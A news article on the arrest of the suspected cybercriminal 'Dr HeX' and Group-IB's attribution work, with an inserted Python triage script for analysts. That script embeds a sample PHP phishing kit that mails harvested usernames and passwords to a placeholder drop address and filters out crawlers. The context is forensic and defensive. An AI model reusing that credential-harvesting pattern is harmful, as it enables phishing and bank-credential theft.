A Moroccan man suspected of being “Dr HeX” – the prolific threat actor behind a nine-year cyber-blitz on thousands of victims through phishing, website defacing, malware development, fraud and carding – has been arrested.
Interpol announced the bust – which took place in Morocco in May – on Tuesday, describing it as the result of a joint two-year probe dubbed Operation Lyrebird that saw Interpol working closely with the Moroccan police and security firm Group-IB.
The unnamed suspect allegedly helped to develop carding and phishing kits to sell on criminal online forums. One example of a carding site is Joker’s Stash, which was taken down in December. It was a popular cybercriminal destination that specialized in trading in payment-card data, offering millions of stolen credit and debit cards to buyers.
As described in Interpol’s announcement, the buyers of Dr HeX’s carding and phishing kits used them to masquerade as online-banking facilities, allowing the suspect and others “to steal sensitive information and defraud trusting individuals for financial gain, with the losses of individuals and companies published online in order to advertise these malicious services.”
We saw one such example of how the carding economy works in October, when Dallas-based smoked-meat franchise Dickey’s Barbecue Pit saw 3 million customer payment cards turn up for sale on Joker’s Stash. Anyone purchasing the data could encode it onto cloned magnetic-stripe cards to use at ATMs or at in-store terminals that don’t enforce chip transactions; or, they could simply use the card numbers to buy things online.
According to a writeup from Group-IB, the suspect was allegedly involved in attacks on 134 websites over the course of nine years, from 2009-2018, leaving his signature “Dr HeX” nickname on the attacked web pages. Dr HeX was just one of the nicknames the suspect allegedly used, but that’s the one that the security firm chose to dub the threat actor whom they tracked.
Squeezing an Identity Out of a Phishing Kit
The starting point for Group-IB researchers’ quest to track down and to unmask Dr HeX was the extraction of a phishing kit, which is a tool used to create phishing web pages. That phishing kit was being used to exploit the brand of a large French bank, according to their writeup.
The phishing kit used a typical setup, they described: It included “the creation of a spoofed website of a targeted company, the mass distribution of emails impersonating it and asking users to enter login information on the spoofed site. The credentials left by unsuspecting victims on the fake page were then redirected to the perpetrator’s email.”
Almost all of the scripts in the phishing kit carried the signature of their creator, Dr HeX, together with a contact email address.
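As an added illustration (this is not code from the original article, from Group-IB or from Interpol), the following Python script shows the kind of triage an analyst runs over a recovered phishing kit to pull out exactly the artifacts the investigation pivoted on: the drop address that the credential-collection script mails results to, nicknames left as signatures in code comments, any other contact emails, and the redirect back to the legitimate site that hides the theft from the victim. The three-file kit it reads is constructed inline; the handle `Mr_Sample` and every address and domain in it are placeholders, not indicators from the real case.

```python
import re

# Constructed sample phishing kit (three files held in memory). The handle,
# addresses and domains are placeholders invented for this example.
SAMPLE_KIT = {
    "index.html": (
        "<!-- Coded by Mr_Sample -->\n"
        '<form action="login.php" method="POST">\n'
        '  <input name="user"><input name="pass" type="password">\n'
        "</form>\n"
    ),
    "login.php": (
        "<?php\n"
        "// Mr_Sample | contact: kit-author@example.invalid\n"
        '$to = "drop-box@example.invalid";\n'
        "$msg = \"User: \".$_POST['user'].\"\\nPass: \".$_POST['pass'];\n"
        'mail($to, "New Result", $msg);\n'
        'header("Location: https://bank.example.invalid/");\n'
        "?>\n"
    ),
    "blocker.php": (
        "<?php\n"
        "# Mr_Sample\n"
        "$blocked = array('crawler', 'bot');\n"
        "foreach ($blocked as $b) { if (stripos($_SERVER['HTTP_USER_AGENT'], $b) !== false) { exit; } }\n"
        "?>\n"
    ),
}

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
# First argument of PHP mail(): either a quoted literal or a variable name.
MAIL_CALL_RE = re.compile(r"""\bmail\(\s*(?:(\$\w+)|["']([^"']+)["'])""")
# Simple string assignment such as:  $to = "addr";
ASSIGN_RE = re.compile(r"""(\$\w+)\s*=\s*["']([^"']+)["']\s*;""")
# Comment lines carrying only a handle, e.g.  // Mr_Sample | ...  or  # Mr_Sample
HANDLE_LINE_RE = re.compile(r"^\s*(?://|#)\s*([A-Za-z][\w.-]{2,})\s*(?:\||$)", re.M)
CODED_BY_RE = re.compile(r"\bcoded by\s+([A-Za-z][\w.-]{2,})", re.I)
REDIRECT_RE = re.compile(r"""header\(\s*["']Location:\s*([^"'\s]+)""", re.I)


def drop_addresses(src):
    """Return the addresses that harvested credentials are mailed to."""
    assigned = dict(ASSIGN_RE.findall(src))  # "$var" -> string literal
    found = set()
    for var, literal in MAIL_CALL_RE.findall(src):
        value = literal or assigned.get(var, "")  # resolve $to = "..." if needed
        found.update(EMAIL_RE.findall(value))
    return found


def handles(src):
    """Return nicknames left in code comments (the author's 'signature')."""
    return set(HANDLE_LINE_RE.findall(src)) | set(CODED_BY_RE.findall(src))


def triage_kit(files):
    """Collect attribution indicators from every file of a kit (name -> source)."""
    result = {"emails": set(), "drop_addresses": set(), "handles": set(), "redirects": set()}
    for src in files.values():
        result["emails"].update(EMAIL_RE.findall(src))
        result["drop_addresses"].update(drop_addresses(src))
        result["handles"].update(handles(src))
        result["redirects"].update(REDIRECT_RE.findall(src))
    return {key: sorted(values) for key, values in result.items()}


if __name__ == "__main__":
    for key, values in triage_kit(SAMPLE_KIT).items():
        print(f"{key}: {', '.join(values) or '-'}")
```

Real kits vary (results are sometimes written to a local file or POSTed to a Telegram bot rather than mailed), so the `mail()` resolver is only one exfiltration channel to cover; the point is that every such channel, plus the vanity signature, is a pivot to domain registrations, forum posts and social-media accounts, which is the chain Group-IB describes following here.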
Dr HeX liked that nickname quite a bit: Group-IB researchers found that the alleged attacker’s YouTube channel was registered under the same name. In one of the videos on that channel, the attacker also left a link to an Arabic crowdfunding platform, which gave Group-IB researchers another link back to the alleged cybercriminal.
The name was also used to register “at least” two domains that were created with the email found in the phishing kit, Group-IB said.
Based on the email address from the phishing kit, researchers identified other elements of the threat actor’s malicious infrastructure: five email addresses associated with the suspect, six nicknames in total, and his accounts on Facebook, Instagram, Skype and YouTube.
Between 2009 and 2018, analysts found that Dr HeX defaced over 130 web pages. They also discovered the cybercriminal’s posts “on several popular underground platforms intended for malware trading that indicate the latter’s involvement in malware development,” according to Group-IB. Analysts also found evidence that might link Dr HeX to attacks on “several huge French corporations” with the aim of “stealing customer’s bank-card data.”
Group-IB’s post quoted Stephen Kavanagh, Interpol executive director of police services, who called Operation Lyrebird “a significant success against a suspect who is accused of targeting unsuspecting individuals and companies across multiple regions for years.”
“The case highlights the threat posed by cybercrime worldwide,” Kavanagh continued. “The arrest of this suspect is down to outstanding international investigative work and new ways of collaboration, both with Moroccan police and our vital private sector partners such as Group-IB.”